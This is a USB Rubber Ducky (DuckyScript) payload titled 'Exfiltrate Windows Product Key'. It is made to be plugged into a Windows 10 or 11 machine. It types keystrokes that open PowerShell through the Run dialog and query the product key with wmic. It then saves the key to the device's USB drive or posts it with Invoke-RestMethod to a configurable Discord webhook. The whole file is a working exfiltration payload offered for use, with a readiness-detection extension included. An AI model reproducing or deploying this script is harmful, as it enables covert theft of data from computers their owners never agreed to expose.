REM_BLOCK
###################################################
#                                                 |
# Title        : Exfiltrate Windows Product Key   |
# Author       : Aleff                            |
# Version      : 1.0                              |
# Category     : Exfiltration                     |
# Target       : Windows 10-11                    |
#                                                 |
###################################################
END_REM

REM Put here your Discord Webhook, i.e. https://discord.com/api/webhooks/0123456789.../abcefg...
DEFINE #DISCORD_WEBHOOK example.com

REM_BLOCK
How would you prefer to do the exfiltration?
Via Discord Webhooks or via Rubber Ducky USB storage?
If you prefer to use the storage offered by USB Rubber Ducky, set the boolean variable #USB_RUBBER_DUCKY_STORAGE to TRUE, otherwise set it to FALSE and the alternative mode will be automatically selected, so via Discord Webhook.
END_REM
DEFINE #USB_RUBBER_DUCKY_STORAGE TRUE


REM_BLOCK
This definition allows the drive label to be parameterized dynamically.
Instead of hardcoding the "DUCKY" label throughout the script, we use a defined variable at the beginning that can be easily adjusted.
This way, if the drive label changes or needs to be customized for different environments, you only need to update this definition without altering multiple instances in the code. It’s an approach that enhances the script's flexibility and maintainability.
END_REM
DEFINE #DUCKY_DRIVE_LABEL DUCKY


EXTENSION DETECT_READY
    REM VERSION 1.1
    REM AUTHOR: Korben

    REM_BLOCK DOCUMENTATION
        USAGE:
            Extension runs inline (here)
            Place at beginning of payload (besides ATTACKMODE) to act as dynamic
            boot delay

        TARGETS:
            Any system that reflects CAPSLOCK will detect minimum required delay
            Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
    END_REM

    REM CONFIGURATION:
    DEFINE #RESPONSE_DELAY 25
    DEFINE #ITERATION_LIMIT 120

    VAR $C = 0
    WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
        CAPSLOCK
        DELAY #RESPONSE_DELAY
        $C = ($C + 1)
    END_WHILE
    CAPSLOCK
END_EXTENSION

GUI r
DELAY 1000
STRINGLN powershell
DELAY 2000

STRINGLN $key_detected=$(wmic path softwarelicensingservice get OA3xOriginalProductKey)+$(wmic path softwarelicensingservice get OA3xOriginalProductKeyDescription);

IF_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
    STRINGLN
        $m=(Get-Volume -FileSystemLabel '#DUCKY_DRIVE_LABEL').DriveLetter;
        echo $key_detected >> ${m}:\exfiltration.txt
    END_STRINGLN
END_IF_DEFINED
IF_NOT_DEFINED_TRUE #USB_RUBBER_DUCKY_STORAGE
    STRINGLN
        $hookUrl = "#DISCORD_WEBHOOK"
        $exfiltration = @"$key_detected"@
        $payload = [PSCustomObject]@{
            content = $exfiltration
        }
        Invoke-RestMethod -Uri $hookUrl -Method Post -Body ($payload | ConvertTo-Json) -ContentType 'Application/Json'; exit
    END_STRINGLN
END_IF_DEFINED